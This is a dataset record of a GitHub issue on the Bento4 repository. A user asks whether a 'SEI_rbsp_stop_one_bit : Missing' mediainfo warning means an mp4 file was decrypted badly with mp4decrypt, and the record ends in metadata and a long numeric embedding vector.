1,737
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hello, i decryted an mp4 file with mp4decrypt. It was encoded with ATEME Titan File. The mediainfo of the decrypted file shows this "SEI_rbsp_stop_one_bit : Missing" . Is the file correctly decrypted or is this related to the encoder version? Can ignore this? I already found this https://github.com/rigaya/NVEnc/issues/75
SEI_rbsp_stop_one_bit missing
https://api.github.com/repos/axiomatic-systems/Bento4/issues/584/comments
0
2021-03-03T01:22:04
2021-03-03T01:22:04Z
https://github.com/axiomatic-systems/Bento4/issues/584
820,532,720
584
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : SEI_rbsp_stop_one_bit missing Issue date: --- start body --- Hello, i decryted an mp4 file with mp4decrypt. It was encoded with ATEME Titan File. The mediainfo of the decrypted file shows this "SEI_rbsp_stop_one_bit : Missing" . Is the file correctly decrypted or is this related to the encoder version? Can ignore this? I already found this https://github.com/rigaya/NVEnc/issues/75 --- end body ---
477
[ -0.005811864044517279, 0.01808135397732258, -0.012814109213650227, 0.005531773902475834, 0.018781578168272972, 0.005166101269423962, -0.0014694990823045373, 0.04752190783619881, -0.03258378431200981, 0.029393870383501053, 0.008169286884367466, -0.009958749637007713, -0.00433361204341054, -0.0010260235285386443, 0.007854185067117214, 0.025348128750920296, 0.0009822594001889229, 0.0005358663038350642, -0.0007478787447325885, -0.030638715252280235, 0.03130781650543213, -0.01668090559542179, 0.02800898253917694, 0.019450683146715164, 0.007080048322677612, 0.021893687546253204, -0.036878492683172226, 0.008138165809214115, -0.03902585059404373, -0.012751867063343525, 0.02414996735751629, 0.0015424391021952033, -0.01377108320593834, 0.005644587799906731, 0.006753277033567429, 0.019046107307076454, 0.06566550582647324, 0.029689520597457886, -0.023045169189572334, 0.023620909079909325, -0.020633284002542496, -0.04051966220140457, -0.020462118089199066, 0.030171899124979973, -0.030918804928660393, 0.00486656092107296, 0.012993055395781994, -0.026172837242484093, -0.04048854112625122, 0.009616417810320854, 0.007072268053889275, -0.014689154922962189, -0.01447908766567707, -0.023527545854449272, 0.0014257350703701377, -0.02858472242951393, 0.04677500203251839, 0.010876821354031563, -0.01935731992125511, 0.02593942917883396, -0.025923868641257286, 0.02340306155383587, -0.00021274184109643102, 0.0396171510219574, -0.02004198357462883, 0.013895567506551743, -0.014183437451720238, 0.00561346672475338, -0.06043716147542, 0.001623159390874207, -0.053466036915779114, -0.024336693808436394, 0.04428531229496002, 0.02754216641187668, -0.0035633649677038193, -0.02564377896487713, 0.060686130076646805, 0.019310638308525085, -0.000992471119388938, 0.011343637481331825, -0.04465876519680023, 0.03703409805893898, -0.04792648181319237, 0.01857929117977619, 0.019575167447328568, -0.02567490004003048, -0.02671745792031288, -0.05732505023479462, -0.020679965615272522, 0.011343637481331825, 0.020306512713432312, 0.017069919034838676, 0.029658399522304535, -0.02133350819349289, 0.0033591329120099545, 0.016867632046341896, -0.011623728089034557, -0.010643413290381432, -0.033486295491456985, -0.04503221809864044, -0.025068039074540138, -0.012004961259663105, 0.0071811918169260025, -0.00601026089861989, 0.03625607118010521, 0.009772023186087608, 0.013848885893821716, -0.015895098447799683, 0.012891911901533604, 0.12579144537448883, 0.00419745733961463, 0.022267140448093414, -0.014626912772655487, 0.00026647435151971877, 0.013833325356245041, 0.020197588950395584, 0.004543679300695658, -0.021847005933523178, -0.004959924146533012, -0.020353194326162338, -0.016120726242661476, -0.03638055548071861, -0.009499712847173214, 0.029176022857427597, -0.003602266311645508, 0.05701383948326111, -0.009134040214121342, -0.01514041144400835, 0.005605686455965042, -0.022531669586896896, -0.0311677735298872, -0.03217921033501625, 0.001513263094238937, 0.005652368068695068, -0.0062670097686350346, 0.03137005865573883, -0.04033293575048447, 0.030514230951666832, -0.010791238397359848, -0.005018276162445545, -0.04388073831796646, -0.027386561036109924, 0.03812333568930626, 0.024461178109049797, -0.02780669555068016, -0.014642473310232162, -0.020430997014045715, -0.004516448359936476, -0.026935305446386337, 0.04260477423667908, 0.00547731202095747, -0.005866325926035643, -0.014634693041443825, -0.022407185286283493, 0.03470001742243767, 0.04223132133483887, -0.0025363690219819546, -0.004107984248548746, 0.005831314716488123, -0.004119654651731253, 0.00897065456956625, -0.015272676013410091, 0.021084539592266083, -0.00023705519561190158, -0.008013681508600712, -0.028569161891937256, 0.002312686061486602, 0.0013771082740277052, -0.00736013799905777, 0.0245234202593565, 0.009180721826851368, -0.010775677859783173, 0.0036547831259667873, -0.01239397469907999, 0.003425265196710825, -0.0360071025788784, 0.03631831333041191, 0.012775207869708538, -0.021349068731069565, -0.018034672364592552, -0.02010422572493553, -0.0008529124315828085, 0.008340452797710896, -0.019170591607689857, -0.011351417750120163, -0.043974101543426514, 0.04008396714925766, -0.04391185939311981, 0.029689520597457886, -0.007348467595875263, 0.04266701638698578, 0.0322103314101696, 0.024118846282362938, -0.016945434734225273, 0.01817471720278263, 0.008099264465272427, -0.02872476726770401, -0.07325904816389084, -0.014385724440217018, 0.009880946949124336, 0.03905697166919708, -0.013288706541061401, -0.018703775480389595, -0.029284946620464325, -0.009312986396253109, 0.007842514663934708, 0.0056484779343008995, 0.04051966220140457, -0.003855125280097127, -0.01848592795431614, -0.04011508822441101, -0.029144901782274246, 0.042915984988212585, 0.028849251568317413, 0.015692809596657753, 0.016323013231158257, -0.012246149592101574, 0.010285520926117897, -0.0207577683031559, 0.010869041085243225, 0.03323732689023018, -0.04565464332699776, -0.006169756408780813, -0.015949560329318047, -0.025923868641257286, 0.013708841055631638, -0.02530144713819027, -0.0030790430027991533, 0.0245234202593565, 0.0026122266426682472, 0.03622495010495186, 0.007080048322677612, -0.03734530881047249, -0.0236987117677927, 0.028880372643470764, -0.00963197834789753, 0.011040206998586655, -0.024025483056902885, -0.02702866867184639, -0.020337633788585663, -0.03821669891476631, 0.059970345348119736, -0.01912390999495983, -0.008713905699551105, -0.0037675972562283278, 0.03634943440556526, 0.013420971110463142, 0.007998120971024036, -0.021271266043186188, 0.029891809448599815, -0.005761292297393084, 0.013957809656858444, 0.005846875254064798, 0.04185786843299866, -0.0031335048843175173, 0.01716328226029873, 0.01831476204097271, 0.03130781650543213, -0.01424567960202694, -0.025410370901226997, 0.023652030155062675, -0.007387368939816952, 0.0000046651243792439345, -0.04836217686533928, 0.0020228710491210222, -0.008200407959520817, -0.01682095043361187, -0.0024255001917481422, -0.02058660238981247, -0.03163459151983261, 0.03843454644083977, -0.0021687510889023542, -0.014696935191750526, 0.012961934320628643, -0.025799384340643883, 0.00213179481215775, -0.004994935356080532, 0.004889901727437973, 0.01576283387839794, -0.02044655755162239, -0.02475682832300663, 0.017085479572415352, -0.026779700070619583, 0.007648008409887552, 0.0005237096338532865, 0.003421375062316656, -0.009491932578384876, 0.001989804906770587, -0.04459652304649353, 0.01828364096581936, 0.01325758546590805, 0.04338280111551285, -0.05097634717822075, 0.02038431540131569, 0.006208657752722502, -0.007531304378062487, -0.01115691103041172, 0.029565036296844482, 0.0021298497449606657, -0.009523053653538227, -0.008815049193799496, 0.019404001533985138, 0.00976424291729927, 0.016182968392968178, -0.055333301424980164, 0.012580701150000095, -0.0009239073842763901, 0.030607594177126884, -0.015895098447799683, -0.03441992774605751, 0.008745026774704456, -0.04833105579018593, -0.007060597650706768, -0.0005086353630758822, -0.03163459151983261, -0.01300861593335867, -0.021177902817726135, -0.03768764063715935, -0.039150334894657135, 0.01753673516213894, -0.03143230080604553, 0.03367302194237709, -0.01906166784465313, 0.008130385540425777, -0.009048457257449627, -0.03157234936952591, -0.009585295803844929, 0.018812699243426323, -0.024912433698773384, 0.006430395413190126, 0.015109290368855, 0.017832385376095772, 0.01759897731244564, 0.004695394542068243, -0.0076674590818583965, -0.02326301671564579, -0.005348937585949898, -0.023994361981749535, 0.00013250777556095272, -0.007807503920048475, -0.004777087364345789, 0.00030124245677143335, 0.029829567298293114, -0.032334815710783005, 0.009919848293066025, 0.00842603575438261, -0.019155031070113182, 0.017458932474255562, 0.011927158571779728, 0.011950499378144741, 0.0010357488645240664, -0.016571981832385063, -0.002230993239209056, -0.012253929860889912, 0.02187812700867653, -0.024538980796933174, -0.02855360135436058, -0.028460238128900528, 0.04344504326581955, -0.021240144968032837, 0.013522114604711533, -0.01791018806397915, -0.009982090443372726, 0.027993422001600266, 0.011110229417681694, 0.006792178377509117, -0.024710146710276604, -0.00443475553765893, 0.009818704798817635, -0.010876821354031563, 0.016151847317814827, 0.021800324320793152, -0.0471484549343586, 0.029596157371997833, -0.016167407855391502, -0.014743616804480553, 0.006982794962823391, 0.021271266043186188, -0.034575533121824265, 0.021084539592266083, -0.01923283562064171, 0.02604835294187069, 0.011577046476304531, -0.02716871351003647, 0.022220458835363388, -0.02780669555068016, -0.00018320111848879606, 0.020726647228002548, -0.04686836525797844, -0.027184274047613144, -0.0217692032456398, -0.005018276162445545, -0.006527648773044348, -0.068217433989048, -0.0015570271061733365, 0.05636029690504074, -0.044440917670726776, -0.013981150463223457, 0.006333142053335905, -0.012930813245475292, 0.031727954745292664, -0.008566080592572689, 0.02190924808382988, -0.0009487070492468774, -0.03180575743317604, 0.05016719922423363, -0.021893687546253204, -0.03326844796538353, 0.00034135946771129966, -0.011966059915721416, 0.01716328226029873, -0.01630745269358158, 0.00023316506121773273, 0.015576106496155262, 0.008737246505916119, 0.005718500819057226, 0.014759177342057228, -0.007869746536016464, -0.006025821436196566, 0.04689948633313179, -0.0015171532286331058, 0.0019110295688733459, -0.02288956381380558, 0.0037248057778924704, 0.046681638807058334, -0.0008179011638276279, -0.013669939711689949, 0.00907179806381464, 0.038745760917663574, -0.03768764063715935, -0.011086888611316681, -0.01650973968207836, 0.008745026774704456, -0.0264529287815094, 0.022702835500240326, 0.002456621266901493, -0.017287766560912132, -0.011826015077531338, -0.010565610602498055, 0.03513571247458458, -0.0312300156801939, 0.06491860002279282, -0.03616270795464516, 0.01000543124973774, 0.04384961724281311, -0.01141366083174944, -0.030716517940163612, -0.052750252187252045, -0.027044229209423065, -0.019186152145266533, -0.013747742399573326, 0.03672288730740547, -0.004621481988579035, 0.008247089572250843, -0.00493269320577383, -0.00520500261336565, 0.017490053549408913, -0.006550989579409361, 0.05508433282375336, -0.003923202399164438, -0.02346530370414257, 0.02156691625714302, 0.010806798934936523, -0.011950499378144741, 0.04773975536227226, -0.00990428775548935, -0.05751177668571472, -0.011312516406178474, 0.009390789084136486, 0.013459872454404831, -0.0070761581882834435, 0.003956269007176161, 0.030405307188630104, 0.004660383332520723, -0.0013138935901224613, 0.02625064179301262, -0.026406247168779373, -0.0132264643907547, -0.0062164380215108395, -0.023760953918099403, 0.018190277740359306, -0.030949926003813744, -0.017645658925175667, 0.02481907047331333, -0.015980681404471397, 0.0022018172312527895, 0.00042062101420015097, -0.016354134306311607, -0.006566550582647324, 0.017552295699715614, -0.004072973039001226, -0.00983426533639431, 0.00019888322276528925, -0.017987990751862526, 0.010705655440688133, 0.023107411339879036, 0.004757636692374945, 0.009064017795026302, 0.033424053341150284, 0.0160429235547781, 0.007854185067117214, 0.028273511677980423, 0.015093729831278324, 0.003930982667952776, 0.03079432062804699, -0.008169286884367466, 0.012915252707898617, 0.05247016251087189, -0.01932619884610176, 0.01102464646100998, -0.02228270098567009, -0.019590727984905243, -0.02866252511739731, -0.02875588834285736, -0.02320077456533909, -0.004458096344023943, -0.010907942429184914, 0.0034913974814116955, 0.006228108424693346, 0.025721581652760506, -0.00657822098582983, -0.0050377268344163895, 0.009647538885474205, 0.03995948284864426, 0.006309801246970892, 0.02306072972714901, 0.0036275521852076054, -0.026499610394239426, -0.01027774065732956, 0.0036372775211930275, -0.016463058069348335, -0.01935731992125511, 0.014455746859312057, 0.026437368243932724, -0.01664978452026844, 0.017132161185145378, -0.028335753828287125, 0.017956869676709175, -0.011724871583282948, -0.009873166680335999, -0.002236828440800309, 0.04677500203251839, -0.01742781139910221, 0.004201347474008799, -0.056889355182647705, 0.0047887577675282955, 0.010690094903111458, 0.024974675849080086, 0.010122135281562805, 0.0009545422508381307, 0.006372043397277594, -0.01222280878573656, 0.01339763030409813, 0.03048310987651348, -0.015599447302520275, 0.03451329097151756, 0.004691504407674074, 0.04235580563545227, 0.02394768036901951, 0.018221398815512657, -0.009484152309596539, 0.01538159977644682, 0.008503838442265987, -0.011794894002377987, 0.008418255485594273, 0.02225157991051674, -0.004100203979760408, -0.013988930732011795, -0.016338573768734932, -0.03824781998991966, -0.010464467108249664, -0.01239397469907999, 0.026095034554600716, 0.006803848780691624, 0.0064809671603143215, 0.041422173380851746, -0.006298130843788385, 0.004244138952344656, -0.02078888937830925, -0.0019382605096325278, 0.02875588834285736, -0.04272925853729248, -0.01551386434584856, 0.010122135281562805, 0.02288956381380558, -0.004022401291877031, 0.0039504338055849075, -0.013895567506551743, -0.016291892156004906, -0.020290952175855637, 0.00825486984103918, 0.03407759591937065, 0.01000543124973774, -0.008566080592572689, 0.005590125918388367, -0.021784763783216476, -0.0066754743456840515, 0.0188905019313097, 0.031759075820446014, 0.02153579518198967, -0.01325758546590805, 0.03631831333041191, -0.010417785495519638, -0.01548274327069521, -0.02092893421649933, -0.0011038262164220214, -0.028273511677980423, 0.0036878492683172226, -0.018672654405236244, 0.03326844796538353, -0.022500548511743546, 0.02058660238981247, 0.05548890680074692, -0.01538159977644682, 0.024118846282362938, -0.0025091380812227726, 0.017303327098488808, -0.012829669751226902, -0.011896037496626377, -0.018205838277935982, -0.00203065131790936, -0.005792413372546434, 0.04506333917379379, -0.002555819693952799, 0.006325361784547567, 0.008340452797710896, 0.004446425940841436, -0.013584356755018234, 0.0038026084657758474, -0.02513028122484684, -0.028102345764636993, 0.043289437890052795, -0.02326301671564579, -0.02662409469485283, -0.04991823062300682, -0.009569735266268253, 0.018236959353089333, -0.022173777222633362, 0.02601723186671734, -0.028444677591323853, 0.011250274255871773, -0.014658033847808838, -0.017879066988825798, -0.00004722868834505789, -0.01814359612762928, 0.011460342444479465, 0.005045507103204727, 0.020166467875242233, 0.00429860083386302, -0.014097854495048523, -0.04126656800508499, -0.0015891207149252295, 0.003547804430127144, 0.013366509228944778, 0.00005665011121891439, -0.047864239662885666, 0.031012168154120445, 0.03616270795464516, -0.01246399711817503, -0.041391052305698395, -0.008379354141652584, 0.011763772927224636, 0.007418490014970303, -0.009943189099431038, 0.026841942220926285, 0.008278210647404194, 0.003022636054083705, -0.022951805964112282, 0.003168516093865037, 0.0020462118554860353, 0.005041616968810558, -0.046370428055524826, 0.040675267577171326, -0.014953684993088245, -0.00815372634679079, -0.0068622007966041565, -0.031930241733789444, 0.02323189564049244, 0.01098574511706829, 0.006379823666065931, 0.008519398979842663, 0.008534959517419338, -0.026063913479447365, -0.0019917499739676714, -0.003635332453995943, -0.0007459336775355041, 0.00986538641154766, -0.016011802479624748, -0.01736556924879551, -0.03242817893624306, 0.025285886600613594, -0.0058429851196706295, 0.025550415739417076, 0.0027736672200262547, 0.015171532519161701, -0.023589788004755974, -0.0049832649528980255, -0.011133570224046707, -0.012720745988190174, -0.013887787237763405, -0.026561852544546127, -0.0013518224004656076, -0.005854655522853136, 0.008060363121330738, -0.0038940266240388155, 0.013662159442901611, 0.005566785112023354, -0.024056604132056236, 0.027511045336723328, 0.0018030782230198383, -0.02007310464978218, 0.015809515491127968, -0.001106743817217648, 0.01420677825808525, -0.023652030155062675, 0.009795363992452621, 0.014992586337029934, -0.011934938840568066, -0.007597436662763357, -0.020228710025548935, 0.008962874300777912, 0.0024352255277335644, -0.02421220950782299, -0.017381129786372185, 0.0026044463738799095, 0.012152786366641521, -0.026935305446386337, -0.0022212679032236338, 0.0076402281410992146, 0.021442431956529617, -0.022951805964112282, 0.01112578995525837, 0.00859720166772604, 0.010861260816454887, -0.011639288626611233, 0.009087358601391315, -0.023371940478682518, -0.014588011428713799, 0.037594277411699295, -0.0019470133120194077, 0.008682784624397755, -0.005317816510796547, -0.015163752250373363, 0.013319827616214752, -0.02102229744195938, -0.015895098447799683, 0.016976555809378624, 0.02527032606303692, -0.03357965871691704, 0.00040384478052146733, 0.03289499506354332, -0.0003851235087495297, 0.01736556924879551, -0.058383166790008545, -0.00245078606531024, -0.013763302937150002, 0.0416400209069252, -0.0003863391757477075, 0.037220824509859085, 0.003666453529149294, -0.0015784228453412652, 0.01174821238964796, -0.014844760298728943, 0.014027832075953484, 0.01773902215063572, 0.006076393183320761, 0.01312532089650631, -0.013911128044128418, 0.010542269796133041, -0.03407759591937065, -0.03065427578985691, 0.024570101872086525, -0.04282262176275253, -0.018843820318579674, 0.002236828440800309, 0.01161594782024622, -0.025005796924233437, -0.023107411339879036, -0.006936113350093365, -0.0006666721310466528, -0.027448803186416626, 0.020975615829229355, -0.06971124559640884, 0.024507859721779823, 0.01171709131449461, -0.028802569955587387, 0.007947549223899841, 0.004454206209629774, 0.005298365838825703, -0.014012271538376808, 0.003259934252128005, -0.00812260527163744, 0.04391185939311981, -0.017209963873028755, 0.010371103882789612, -0.01797243021428585, 0.005317816510796547, 0.018330322578549385, -0.03252154216170311, -0.009406349621713161, 0.028615843504667282, 0.018703775480389595, -0.0018731007585301995, -0.02743324264883995, -0.01563834771513939, 0.007375698536634445, -0.010231059044599533, -0.020882252603769302, -0.024134406819939613, 0.021426871418952942, -0.009468591772019863, -0.035384681075811386, 0.0264529287815094, -0.0035653100349009037, 0.0217692032456398, -0.005971359554678202, 0.026873063296079636, -0.021177902817726135, 0.011911598034203053, 0.03137005865573883, -0.013312047347426414, 0.02760440856218338, -0.015047048218548298, -0.035011228173971176, 0.00924296397715807, -0.017458932474255562, -0.007255104370415211, 0.04942029342055321, -0.005053287371993065, 0.015358258970081806, 0.0010717326076701283, 0.018703775480389595, -0.003588650841265917, 0.027122031897306442, -0.0284135565161705, 0.025783823803067207, -0.014066733419895172, -0.023247456178069115, -0.017069919034838676, 0.05371500551700592, -0.022438306361436844, 0.012331732548773289, -0.04005284607410431, -0.03753203526139259, 0.0005893556517548859, -0.0284135565161705, -0.0023710380773991346, -0.015296016819775105, -0.0008694455027580261, 0.015428281389176846, 0.005792413372546434, 0.010869041085243225, -0.007375698536634445, 0.0180035512894392, -0.022905124351382256, -0.02400992251932621, -0.009888727217912674, -0.035664770752191544, -0.002409939654171467, -0.016151847317814827, 0.01065119355916977, 0.04002172499895096, -0.05334155261516571, 0.008402694948017597, 0.007893087342381477, -0.0031159992795437574, -0.003553639631718397, -0.04988710954785347, -0.015373819507658482, -0.011584826745092869, -0.02495911531150341, -0.027962300926446915, 0.01013769581913948, -0.013319827616214752, -0.024196648970246315, -0.01759897731244564, -0.005333377048373222, 0.017692340537905693, 0.0003831784415524453, 0.004236358683556318, -0.0051699914038181305, 0.011966059915721416, 0.0057379514910280704, 0.006866090930998325, 0.0282890722155571, -0.01668090559542179, -0.015467182733118534, -0.03734530881047249, -0.04693060740828514, 0.0036042113788425922, 0.022220458835363388, 0.0141756571829319, -0.021660279482603073, 0.019559606909751892, 0.026530731469392776, 0.012697405181825161, 0.007002245634794235, -0.04260477423667908, -0.030529791489243507, -0.02455454133450985, -0.0047615268267691135, -0.01780126430094242, 0.00986538641154766, -0.010184377431869507, 0.0007707332842983305, -0.013187563046813011, 0.018625972792506218, 0.010363323614001274, -0.0042052376084029675, 0.014774737879633904, 0.007437941152602434, -0.04051966220140457, 0.002026761183515191, 0.01587175764143467, -0.04033293575048447, -0.00775693217292428, -0.01075233705341816, 0.025783823803067207, -0.012705185450613499, 0.06771949678659439, -0.02590830810368061, 0.021691400557756424, -0.01352989487349987, 0.01777014322578907, 0.01875045709311962, -0.030607594177126884, -0.021473553031682968, 0.011133570224046707, 0.020430997014045715, 0.0075896563939750195, -0.0059752496890723705, -0.016540860757231712, 0.0094763720408082, 0.02041543647646904, -0.023916559293866158, -0.03395311161875725, -0.015622788108885288, 0.0022212679032236338, 0.007581876125186682, -0.046370428055524826, 0.03395311161875725, 0.023916559293866158, -0.03205472603440285, -0.03004741482436657, 0.0009117507142946124, 0.023683151230216026, 0.01286857109516859, -0.0064537362195551395, -0.018221398815512657, -0.011211372911930084, 0.0011174416868016124, -0.05019832029938698, -0.032303694635629654, -0.0058974470011889935, -0.01627633161842823, 0.0025947210378944874, -0.02601723186671734, -0.03946154564619064, 0.001454911078326404, 0.0039037519600242376, -0.0245856624096632, 0.026406247168779373, -0.025628218427300453, -0.024834631010890007, 0.017614537850022316, -0.0029895699117332697, -0.013389850035309792, 0.0077219209633767605, -0.022267140448093414, -0.016758708283305168, 0.019715212285518646, -0.004010730888694525, -0.0008913275087252259, 0.0255348552018404, -0.014362383633852005, 0.030607594177126884, 0.009102919138967991, -0.004644822794944048, -0.0034038694575428963, -0.018501488491892815, -0.01472027599811554, -0.0491090826690197, 0.030343065038323402, -0.01722552441060543, 0.017832385376095772, -0.00791642814874649, 0.01963740959763527, 0.016603102907538414, -0.022500548511743546, 0.008449376560747623, -0.004539789166301489, -0.0030518120620399714, -0.003999060485512018, -0.034575533121824265, 0.04584136977791786, -0.0080525828525424, 0.003534188959747553, 0.011172471567988396, 0.008931753225624561, -0.03824781998991966, -0.01932619884610176, -0.005313926376402378, -0.0009812868665903807, 0.009639758616685867, 0.0010600622044876218, 0.0011952443746849895, 0.008161506615579128, -0.007033366709947586, -0.040613025426864624, 0.01906166784465313, 0.008713905699551105, -0.007344577461481094, -0.0015307686990126967, -0.004959924146533012, -0.022469427436590195, -0.011437001638114452, 0.022033732384443283, -0.005523993633687496, 0.023340819403529167, 0.039181455969810486, -0.002890371484681964, -0.0008217913564294577, -0.01929507777094841, 0.021924808621406555, 0.00009919847798300907, 0.03283275291323662, 0.0015871756477281451, 0.0058157541789114475, -0.005986920092254877, 0.012471777386963367, 0.010907942429184914, 0.005749621894210577, 0.01828364096581936, 0.004271369893103838, -0.000786293821875006, -0.01935731992125511, 0.026981987059116364, -0.022671714425086975, -0.018096914514899254, -0.0010590896708890796, 0.018766017630696297, 0.011818234808743, -0.053497157990932465, -0.007605216931551695, -0.00907179806381464, 0.0022562791127711535, 0.005617356859147549, -0.010658973827958107, -0.009134040214121342, 0.0160429235547781, 0.004625372122973204, 0.014230119064450264, 0.03298835828900337, -0.008838390000164509, 0.012300611473619938, -0.0005567757762037218, 0.0009453031816519797, -0.002390488749369979, 0.02567490004003048, -0.002684194128960371, -0.015544985421001911, -0.04167114198207855, -0.02386987768113613, -0.003736476181074977, -0.01990193873643875, -0.013133101165294647, 0.018439246341586113, 0.02268727496266365, 0.0050649577751755714, 0.0013109759893268347, 0.010666754096746445, 0.018439246341586113, -0.010495588183403015, -0.012230589054524899, -0.0013936413452029228, -0.011343637481331825, 0.01444796659052372, 0.0025188634172081947, 0.003602266311645508, -0.0038979167584329844, -0.013957809656858444, -0.01621408946812153, 0.017832385376095772, 0.011468122713267803, -0.030187459662556648, 0.020679965615272522, -0.0055940160527825356, -0.0015852305805310607, -0.008962874300777912, 0.01563834771513939, -0.02268727496266365, -0.014198997989296913, -0.014198997989296913, 0.0048237694427371025, -0.015918439254164696, 0.01759897731244564, 0.018983865156769753, 0.06603895872831345, 0.013996711000800133, -0.008371573872864246, -0.009616417810320854, -0.02343418262898922, 0.012331732548773289, -0.008908412419259548, 0.015863977372646332, 0.014875882305204868, 0.004158555995672941, 0.022500548511743546, -0.014502428472042084, -0.00278922775760293, 0.017552295699715614, 0.0034544412046670914, -0.0015463292365893722, 0.008939533494412899, 0.005173881538212299, -0.005714610684663057, 0.001389751210808754, 0.019310638308525085, 0.008745026774704456, 0.014588011428713799, -0.0011047987500205636, 0.01112578995525837, 0.0017456987407058477, -0.011903817765414715, -0.004742076154798269, 0.0003255557967349887, 0.006908882409334183, -0.028335753828287125, -0.012331732548773289, -0.0029662291053682566, 0.016011802479624748, 0.004633152391761541, -0.0044425358064472675, 0.04092423617839813, 0.007356247864663601, 0.012674064375460148, -0.03119889460504055, 0.0054889824241399765, -0.014128975570201874, 0.03715858235955238, -0.016151847317814827, -0.016431936994194984, -0.01865709386765957, 0.02760440856218338, 0.00736013799905777, -0.008379354141652584, -0.01773902215063572, 0.012853010557591915, -0.014883662573993206, 0.02682638168334961, 0.036878492683172226, -0.015436061657965183, 0.010269960388541222, -0.010153256356716156, 0.016463058069348335, -0.002090948401018977, -0.01742781139910221, 0.0038026084657758474, 0.0013985040131956339, 0.03245930001139641, 0.018672654405236244, 0.012518458999693394, -0.013926688581705093, -0.031354498118162155, 0.013685500249266624, -0.018563730642199516, -0.004426975268870592, 0.008114825002849102, -0.009616417810320854, 0.016431936994194984, -0.005162211135029793, 0.033424053341150284, 0.031790196895599365, -0.002254334045574069, 0.019793014973402023, -0.02990736998617649, 0.01013769581913948, 0.02838243544101715, 0.010977964848279953, -0.024679025635123253, 0.003851235145702958, 0.015093729831278324, 0.015015927143394947, 0.004084643442183733, 0.003182131564244628, 0.00001698895539448131, -0.022874003276228905, 0.009398569352924824, -0.011281395331025124, -0.0067805079743266106, 0.019481804221868515, 0.008247089572250843, 0.015334918163716793, 0.0024721818044781685, -0.0016007911181077361, 0.004757636692374945, -0.01865709386765957, -0.0011242494219914079, -0.0072084227576851845, 0.031992483884096146, -0.010402224957942963, -0.004804318305104971, 0.011732651852071285, -0.0032774400897324085, 0.009095138870179653, 0.015249335207045078, -0.018205838277935982, -0.04914020374417305, -0.016431936994194984, -0.012246149592101574, -0.014191217720508575, -0.021255705505609512, 0.0030479219276458025, 0.008589421398937702, 0.011903817765414715, -0.0033143963664770126, -0.014043392613530159, -0.01903054676949978, -0.010059893131256104, 0.031105531379580498, 0.0036839591339230537, 0.005232233554124832, 0.006344812456518412, -0.010876821354031563, -0.0072862254455685616, 0.029689520597457886, 0.016758708283305168, -0.001298333052545786, 0.014790298417210579, 0.024258891120553017, -0.00019110295397695154, 0.041391052305698395, -0.03079432062804699, -0.0006374961230903864, -0.010487807914614677, 0.018812699243426323, -0.003205472370609641, 0.005881886463612318, 0.013794424012303352, 0.03102772869169712, 0.03364190086722374, 0.008581641130149364, 0.0003243401297368109, -0.001678593922406435, 0.0061347451992332935, 0.037625398486852646, 0.02306072972714901, 0.0019372879760339856, 0.010472247377038002, 0.022236019372940063, 0.045094460248947144, -0.00026404301752336323, -0.023760953918099403, -0.0011261944891884923, -0.01570058986544609, -0.01733444817364216, 0.010363323614001274, 0.0034777820110321045, 0.021146781742572784, 0.03899472951889038, 0.0020890033338218927, 0.013420971110463142, 0.006263119634240866, -0.013249805197119713, -0.05832092463970184, -0.01349877379834652, -0.013623258098959923, 0.017178842797875404, 0.019544046372175217, -0.029891809448599815, -0.009484152309596539, 0.04615258052945137, 0.038745760917663574, -0.029518354684114456, -0.042169079184532166, -0.011320296674966812, 0.016898753121495247, -0.006574330851435661, -0.001884771161712706, -0.010254399850964546, 0.006228108424693346, 0.04801984503865242, -0.02340306155383587, 0.03557140752673149, 0.024305572733283043, -0.015949560329318047, 0.010946843773126602, -0.002104563871398568, 0.02668633684515953, 0.0011232768883928657, -0.016385255381464958, -0.024507859721779823, -0.023511985316872597, 0.0020656625274568796, -0.007577985990792513, 0.010713435709476471, -0.010433346033096313, -0.013646598905324936, 0.005586235783994198, 0.005932458210736513, -0.009974310174584389, 0.014595791697502136, -0.003557529766112566, 0.02122458443045616, -0.012572920881211758, -0.017474493011832237, 0.006897212006151676, -0.018252519890666008, -0.009694220498204231, 0.023247456178069115, 0.00869834516197443, 0.02058660238981247, -0.008558300323784351, 0.03740755096077919, -0.013716621324419975, -0.01122693344950676, 0.0009418993140570819, 0.018968304619193077, 0.0003352811327204108, -0.01020771823823452, 0.008745026774704456, -0.02306072972714901, 0.029860688373446465, 0.013094198890030384, -0.01048002764582634, -0.031385619193315506, -0.006368153262883425, 0.003547804430127144, -0.014409065246582031, 0.008060363121330738, 0.009624198079109192, -0.016058484092354774, -0.013389850035309792, -0.0029798445757478476, 0.003666453529149294, 0.025830505415797234, -0.04605921730399132, 0.0035419692285358906, -0.009748682379722595, -0.009694220498204231, 0.011872696690261364, -0.004010730888694525, -0.00027498402050696313, 0.005656258203089237, 0.02159803733229637, -0.00648485729470849, 0.030327504500746727, -0.01868821494281292, -0.024772388860583305, -0.00433361204341054, 0.008931753225624561, 0.0010999360820278525, 0.042106837034225464, -0.001413092017173767, -0.0031218344811350107, 0.012479557655751705, -0.010441126301884651, -0.00825486984103918, 0.0036333873867988586, -0.005590125918388367, -0.005562894977629185, -0.027666650712490082, 0.011942719109356403, -0.03750091418623924, 0.007045037113130093, -0.012339512817561626, -0.0035050129517912865, 0.0067805079743266106, -0.0004512558225542307, 0.006352592725306749, -0.012557360343635082, -0.022765079513192177, -0.0064809671603143215, 0.00483154971152544, -0.03130781650543213, 0.008068143390119076, 0.015949560329318047, 0.01702323742210865, 0.045996975153684616, 0.005901337135583162, -0.01719440333545208, 0.004002950619906187, 0.007558535318821669, -0.02662409469485283, -0.02682638168334961, 0.00657822098582983, -0.008285990916192532, -0.0060297115705907345, 0.00862832274287939, -0.0002101889404002577, -0.007877526804804802, 0.009468591772019863, -0.01570837013423443, -0.020897813141345978, 0.02360534854233265, -0.00795143935829401, -0.012004961259663105, 0.020742207765579224, -0.0037053548730909824, 0.03438880667090416, 0.0020131457131356, -0.00047775739221833646, 0.020322073251008987, -0.02366759069263935, -0.025145841762423515, -0.007651898544281721, -0.015856197103857994, 0.01607404462993145, -0.03038974665105343, -0.03899472951889038, -0.021955929696559906, -0.004119654651731253, -0.0013041682541370392, -0.0018040507566183805, 0.0025091380812227726, 0.004185786936432123, 0.0032988358289003372, -0.003773432457819581, 0.004209127742797136, -0.022547230124473572, -0.03217921033501625, -0.004423085134476423, 0.001838089432567358, 0.018641533330082893, 0.01447908766567707, -0.0047615268267691135, -0.013374289497733116, 0.012082763947546482, 0.008706125430762768, 0.02444561757147312, 0.00457091024145484, 